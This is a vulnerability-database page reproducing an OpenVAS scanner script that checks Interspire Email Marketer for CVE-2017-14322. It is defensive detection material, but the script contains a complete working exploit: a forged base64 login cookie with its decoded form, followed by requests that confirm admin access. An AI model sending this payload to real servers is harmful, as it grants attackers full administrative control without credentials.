Interspire IEM Remote Authentication Admin Bypass Vulnerability
🗓️ 19 Oct 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType
openvas🔗 plugins.openvas.org👁 247 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Interspire Email Marketer Authentication Bypass Vulnerability | 18 Oct 201700:00 | – | zdt | |
| Interspire Email Marketer - Remote Admin Authentication Bypass Exploit | 22 Apr 201800:00 | – | zdt | |
| The vulnerability in the user registration verification function of the init.php script of the Interspire Email Marketer software allows a hacker to bypass the authentication process or obtain administrator privileges. | 4 Dec 201700:00 | – | bdu_fstec | |
| Interspire Email Marketer Security Bypass Vulnerability | 18 Oct 201700:00 | – | cnvd | |
| CVE-2017-14322 | 18 Oct 201718:00 | – | cve | |
| CVE-2017-14322 | 18 Oct 201718:00 | – | cvelist | |
| Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass | 24 Apr 201800:00 | – | exploitdb | |
| Interspire Email Marketer 6.1.6 - Remote Admin Authentication Bypass | 24 Apr 201800:00 | – | exploitpack | |
| CVE-2017-14322 | 1 Sep 202604:16 | – | kitploit | |
| CVE-2017-14322 | 18 Oct 201718:29 | – | nvd |
10
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:interspire:iem";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.112087");
script_version("2023-06-22T10:34:15+0000");
script_tag(name:"last_modification", value:"2023-06-22 10:34:15 +0000 (Thu, 22 Jun 2023)");
script_tag(name:"creation_date", value:"2017-10-19 08:54:12 +0200 (Thu, 19 Oct 2017)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2019-05-10 17:49:00 +0000 (Fri, 10 May 2019)");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"VendorFix");
script_cve_id("CVE-2017-14322");
script_name("Interspire IEM Remote Authentication Admin Bypass Vulnerability");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_interspire_iem_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("interspire/iem/installed");
script_tag(name:"summary", value:"Interspire Email Marketer (IEM) is prone to a remote authentication admin bypass vulnerability.");
script_tag(name:"vuldetect", value:"This script sends a specially crafted cookie to the web-server that IEM is running to bypass the admin authentication.");
script_tag(name:"insight", value:"The application creates a login cookie to determine and verify the user/admin.
A weak consideration of the type during the confirmation of the cookie's parameters causes the application to grant access to an attacker who forged this specific cookie parameter
by replacing the randomly generated string with just a boolean value ('true').");
script_tag(name:"impact", value:"Successfully exploiting the vulnerability will grant the attack full administration access to the IEM services on the host system.");
script_tag(name:"affected", value:"IEM before version 6.1.6");
script_tag(name:"solution", value:"Upgrade to IEM version 6.1.6 to fix the issue.");
script_xref(name:"URL", value:"https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2017/Oct/39");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
if (!port = get_app_port(cpe:CPE))
exit(0);
if (!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
url = dir + "/admin/index.php?Page=&Action=Login";
# forged part of the cookie, encoded to base64: 'a:4:{s:4:"user";s:1:"1";s:4:"time";i:1710477294;s:4:"rand";b:1;s:8:"takemeto";s:9:"index.php";}'
cookie = "IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE3MTA0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30=";
# additional data that might be required for a valid login
data = "ss_username=admin&ss_password=admin&ss_takemeto=index.php&SubmitButton=Login";
req = http_post_put_req(port:port, url:url, data:data, add_headers:make_array("Cookie", cookie), accept_header:"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
res = http_keepalive_send_recv(port:port, data:req);
if (res =~ "^HTTP/1\.[01] 200" &&
('admin/index.php?Page=Addons&Addon=dbcheck"' >< res || 'admin/index.php?Page=Addons&Addon=checkpermissions' >< res) &&
('<div class="loggedinas">' >< res || '<a href="index.php?Page=Logout"' >< res)
)
{
# Successfully bypassed the authentication.
# For further confirmation of the vulnerability a new GET request is being sent to the host in order to obtain crucial system information.
url = dir + "/admin/index.php?Page=Settings&Action=showinfo";
req = http_get_req(port:port, url:url, add_headers:make_array("Cookie", cookie), accept_header:"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
res = http_keepalive_send_recv(port:port, data:req);
if (res =~ "^HTTP/1\.[01] 200" &&
(('System' >< res && 'Build Date' >< res) || '<title>phpinfo()</title>' >< res ||
'<h1>Configuration</h1>' >< res || ('SERVER_ADMIN' >< res && 'SERVER_ADDR' >< res))
)
{
report = "It was possible to bypass the admin authentication and get unrestricted access to the Interspire Email Marketer system.";
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jun 2023 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 39.8
CVSS 210
EPSS0.36505